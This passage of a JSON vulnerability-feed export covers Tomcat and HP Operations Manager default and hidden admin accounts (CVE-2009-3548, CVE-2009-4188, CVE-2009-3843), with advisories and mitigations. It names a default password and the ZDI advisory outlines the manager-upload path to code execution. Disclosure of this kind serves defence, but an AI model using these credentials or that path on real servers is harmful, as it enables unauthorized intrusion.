"cpe:/a:apache:tomcat:5.0.24", "cpe:/a:apache:tomcat:5.5.25", "cpe:/a:apache:tomcat:5.5.11", "cpe:/a:apache:tomcat:6.0.16", "cpe:/a:apache:tomcat:4.1.19", "cpe:/a:apache:tomcat:4.1.27", "cpe:/a:apache:tomcat:6.0.17", "cpe:/a:apache:tomcat:5.5.19", "cpe:/a:apache:tomcat:5.0.13", "cpe:/a:apache:tomcat:4.1.15", "cpe:/a:apache:tomcat:5.0.26", "cpe:/a:apache:tomcat:5.0.15", "cpe:/a:apache:tomcat:4.1.25", "cpe:/a:apache:tomcat:4.0.2", "cpe:/a:apache:tomcat:5.0.27", "cpe:/a:apache:tomcat:4.1.39", "cpe:/a:apache:tomcat:3.0", "cpe:/a:apache:tomcat:4.0.1", "cpe:/a:apache:tomcat:4.0.4", "cpe:/a:apache:tomcat:5.0.4", "cpe:/a:apache:tomcat:5.5.2", "cpe:/a:apache:tomcat:3.3", "cpe:/a:apache:tomcat:5.5.27", "cpe:/a:apache:tomcat:5.5.18", "cpe:/a:apache:tomcat:5.5.7", "cpe:/a:apache:tomcat:5.5.0", "cpe:/a:apache:tomcat:4.1.28", "cpe:/a:apache:tomcat:4.1.26", "cpe:/a:apache:tomcat:6.0.13", "cpe:/a:apache:tomcat:6.0.11", "cpe:/a:apache:tomcat:5.5.1", "cpe:/a:apache:tomcat:3.1", "cpe:/a:apache:tomcat:6.0.6", "cpe:/a:apache:tomcat:5.5.24", "cpe:/a:apache:tomcat:5.0.2", "cpe:/a:apache:tomcat:4.1.9", "cpe:/a:apache:tomcat:5.0.5", "cpe:/a:apache:tomcat:5.5.20", "cpe:/a:apache:tomcat:5.0.1", "cpe:/a:apache:tomcat:4.1.7", "cpe:/a:apache:tomcat:4.1.36", "cpe:/a:apache:tomcat:4.1.21", "cpe:/a:apache:tomcat:4.1.24", "cpe:/a:apache:tomcat:5.0.22", "cpe:/a:apache:tomcat:6.0.0", "cpe:/a:apache:tomcat:4.1.8", "cpe:/a:apache:tomcat:4.1.1", "cpe:/a:apache:tomcat:3.2.3", "cpe:/a:apache:tomcat:5.5.14", "cpe:/a:apache:tomcat:4.1.12", "cpe:/a:apache:tomcat:4.1.3", "cpe:/a:apache:tomcat:3.3.1", "cpe:/a:apache:tomcat:5.5.9", "cpe:/a:apache:tomcat:6.0.20", "cpe:/a:apache:tomcat:5.5.6", "cpe:/a:apache:tomcat:5.5.13", "cpe:/a:apache:tomcat:5.0.25", "cpe:/a:apache:tomcat:4.1.13", "cpe:/a:apache:tomcat:6.0", "cpe:/a:apache:tomcat:5.5.22", "cpe:/a:apache:tomcat:3.2.2", "cpe:/a:apache:tomcat:4.1.33", "cpe:/a:apache:tomcat:5.0.10", "cpe:/a:apache:tomcat:5.0.18", "cpe:/a:apache:tomcat:6.0.2", "cpe:/a:apache:tomcat:5.5.28", "cpe:/a:apache:tomcat:5.0.21", "cpe:/a:apache:tomcat:5.5.21", "cpe:/a:apache:tomcat:5.0.14", "cpe:/a:apache:tomcat:4.0.3", "cpe:/a:apache:tomcat:5.5.26", "cpe:/a:apache:tomcat:5.5.5", "cpe:/a:apache:tomcat:4.1.4", "cpe:/a:apache:tomcat:6.0.3", "cpe:/a:apache:tomcat:3.3.2", "cpe:/a:apache:tomcat:3.2.1", "cpe:/a:apache:tomcat:4.0.0", "cpe:/a:apache:tomcat:6.0.7", "cpe:/a:apache:tomcat:5.0.29", "cpe:/a:apache:tomcat:4.1.2", "cpe:/a:apache:tomcat:5.0.12", "cpe:/a:apache:tomcat:5.0.16", "cpe:/a:apache:tomcat:4.1.5", "cpe:/a:apache:tomcat:5.0.8", "cpe:/a:apache:tomcat:4.1.32", "cpe:/a:apache:tomcat:4.1.34", "cpe:/a:apache:tomcat:4.1.31", "cpe:/a:apache:tomcat:5.5.3", "cpe:/a:apache:tomcat:4.0.5", "cpe:/a:apache:tomcat:6.0.1", "cpe:/a:apache:tomcat:6.0.9", "cpe:/a:apache:tomcat:4.1.30", "cpe:/a:apache:tomcat:5.0.28", "cpe:/a:apache:tomcat:6.0.5", "cpe:/a:apache:tomcat:5.0.3", "cpe:/a:apache:tomcat:5.0.7", "cpe:/a:apache:tomcat:4.1.18", "cpe:/a:apache:tomcat:5.5.15", "cpe:/a:apache:tomcat:5.0.23", "cpe:/a:apache:tomcat:6.0.8", "cpe:/a:apache:tomcat:5.5.23", "cpe:/a:apache:tomcat:4.1.37", "cpe:/a:apache:tomcat:6.0.14", "cpe:/a:apache:tomcat:4.1.29", "cpe:/a:apache:tomcat:4.1.17", "cpe:/a:apache:tomcat:3.1.1", "cpe:/a:apache:tomcat:4.1.11", "cpe:/a:apache:tomcat:5.5.8", "cpe:/a:apache:tomcat:6.0.12", "cpe:/a:apache:tomcat:5.5.4", "cpe:/a:apache:tomcat:4.1.22", "cpe:/a:apache:tomcat:6.0.10", "cpe:/a:apache:tomcat:4.1.0", "cpe:/a:apache:tomcat:5.0.9", "cpe:/a:apache:tomcat:5.0.0", "cpe:/a:apache:tomcat:4.1.38", "cpe:/a:apache:tomcat:5.0.11", "cpe:/a:apache:tomcat:5.5.12", "cpe:/a:apache:tomcat:4.1.35", "cpe:/a:apache:tomcat:4.1.23", "cpe:/a:apache:tomcat:4.1.10", "cpe:/a:apache:tomcat:5.0.17", "cpe:/a:apache:tomcat:3.2", "cpe:/a:apache:tomcat:4.1.16"], "id": "CVE-2009-3548", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3548", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:tomcat:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.3.1a:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.9:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:3.2.2:beta2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T21:38:14", "description": "HP Operations Dashboard has a default password of j2deployer for the j2deployer account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3098.", "cvss3": {}, "published": "2009-12-03T17:30:00", "type": "cve", "title": "CVE-2009-4188", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3098", "CVE-2009-4188"], "modified": "2009-12-04T05:00:00", "cpe": ["cpe:/a:hp:operations_dashboard:*"], "id": "CVE-2009-4188", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4188", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:operations_dashboard:*:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c01931960\r\nVersion: 1\r\n\r\nHPSBMA02478 SSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2009-11-18\r\nLast Updated: 2009-11-18\r\n\r\nPotential Security Impact: Remote unauthorized access\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Operations Manager for Windows. The\r\nvulnerability could be exploited remotely to gain unauthorized access.\r\n\r\nReferences: CVE-2009-3843\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Operations Manager for Windows v8.10\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-3843 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:N&#41; 9.4\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Stephen Fewer of Harmony Security working with TippingPoint&#39;s\r\nZero Day initiative for reporting this vulnerability to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made the following patch available to resolve the vulnerability. The patch is available for\r\ndownload from http://support.openview.hp.com/selfsolve/patches\r\n\r\nProduct\r\n Version\r\n Patch\r\n\r\nHP Operations Manager for Windows\r\n 8.10\r\n OMW_00032 or subsequent\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\nNone\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 18 November 2009 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems\r\nrunning HP software products should be applied in accordance with the customer&#39;s patch management\r\npolicy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted\r\nusing PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber&#39;s choice for Business: sign-in.\r\nOn the web page: Subscriber&#39;s Choice: your profile summary - use Edit Profile to update appropriate\r\nsections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing &amp; Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity.\r\nHP is continually reviewing and enhancing the security features of software products to provide\r\ncustomers with current secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to bring to the attention of users of\r\nthe affected HP products the important security information contained in this Bulletin. HP recommends\r\nthat all users determine the applicability of this information to their individual situations and\r\ntake appropriate action. HP does not warrant that this information is necessarily accurate or\r\ncomplete for all user situations and, consequently, HP will not be responsible for any damages\r\nresulting from user&#39;s use or disregard of the information provided in this Bulletin. To the extent\r\npermitted by law, HP disclaims all warranties, either express or implied, including the warranties of\r\nmerchantability and fitness for a particular purpose, title and non-infringement.&quot;\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained\r\nherein. The information provided is provided &quot;as is&quot; without warranty of any kind. To the extent\r\npermitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost profits;damages relating to\r\nthe procurement of substitute products or services; or damages for loss of data, or software\r\nrestoration. The information in this document is subject to change without notice. Hewlett-Packard\r\nCompany and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product and company names mentioned herein\r\nmay be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAksERwAACgkQ4B86/C0qfVnibACgmYvkL5wCSUtU9mVpWPSwQWAY\r\nlx8AoL0P1iOjGRgCdvWxEnlNM9tKr71j\r\n=p9gT\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2009-11-20T00:00:00", "title": "[security bulletin] HPSBMA02478 SSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22818", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22818", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:58:45", "description": "There is a hidden undocumented Tomcat account.", "edition": 2, "cvss3": {}, "published": "2009-11-23T00:00:00", "title": "HP Operations Manager backdoor account", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-23T00:00:00", "id": "SECURITYVULNS:VULN:10414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10414", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:32", "description": "ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-085\r\nNovember 20, 2009\r\n\r\n-- CVE ID:\r\nCVE-2009-3843\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Operations Manager for Windows\r\n\r\n-- TippingPoint&#40;TM&#41; IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9261. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett-Packard Operations Manager.\r\nAuthentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists due to a hidden account present within the\r\nTomcat users XML file. Using this account a malicious user can access\r\nthe org.apache.catalina.manager.HTMLManagerServlet class. This is\r\ndefined within the catalina-manager.jar file installed with the product.\r\nThis servlet allows a remote user to upload a file via a POST request to\r\n/manager/html/upload. If an attacker uploads malicious content it can\r\nthen be accessed and executed on the server which leads to arbitrary\r\ncode execution under the context of the SYSTEM user.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960\r\n\r\n-- Disclosure Timeline:\r\n2009-11-09 - Vulnerability reported to vendor\r\n2009-11-20 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Stephen Fewer of Harmony Security &#40;www.harmonysecurity.com&#41;\r\n\r\n-- About the Zero Day Initiative &#40;ZDI&#41;:\r\nEstablished by TippingPoint, The Zero Day Initiative &#40;ZDI&#41; represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors &#40;including competitors&#41; who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n", "edition": 1, "cvss3": {}, "published": "2009-11-23T00:00:00", "title": "ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-23T00:00:00", "id": "SECURITYVULNS:DOC:22821", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22821", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:14:42", "description": "admin account with empty password is created during installation.", "edition": 2, "cvss3": {}, "published": "2009-11-09T00:00:00", "title": "Apache Tomcat for Windows backdoor account", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-3548"], "modified": "2009-11-09T00:00:00", "id": "SECURITYVULNS:VULN:10389", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10389", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "description": "CVE-2009-3548: Apache Tomcat Windows Installer insecure default\r\nadministrative password\r\n\r\nSeverity: Low\r\n\r\nVendor:\r\nThe Apache Software Foundation\r\n\r\nVersions Affected:\r\nTomcat 5.5.0 to 5.5.28\r\nTomcat 6.0.0 to 6.0.20\r\n\r\nThe unsupported Tomcat 3.x, 4.0.x, 4.1.x and 5.0.x versions may be also\r\naffected.\r\n\r\nDescription:\r\nThe Windows installer defaults to a blank password for the\r\nadministrative user. If this is not changed during the install process,\r\nthen by default a user is created with the name admin, roles admin and\r\nmanager and a blank password.\r\n\r\nMitigation:\r\nUsers of all Tomcat versions may mitigate this issue by one of the\r\nfollowing methods:\r\n- Using the .zip or .tar.gz distributions\r\n- Specifying a strong password for the admin user when using the\r\n Windows installer\r\n- Removing the admin user from the tomcat-users.xml file after the\r\n Windows installer has completed\r\n- Editing the tomcat-users.xml file to provide the admin user with\r\n a strong password after the Windows installer has completed\r\n\r\nA patch for this issue [1] has been applied to trunk and will be\r\nincluded in the next releases of 6.0.x and 5.5.x\r\n\r\nCredit:\r\nThis issue was reported directly [2] to the tomcat users public mailing\r\nlist by David Horheim.\r\nSecurity researchers are reminded that undisclosed vulnerabilities in\r\nApache Tomcat should, in the first instance, be reported to the private\r\nsecurity mailing list. 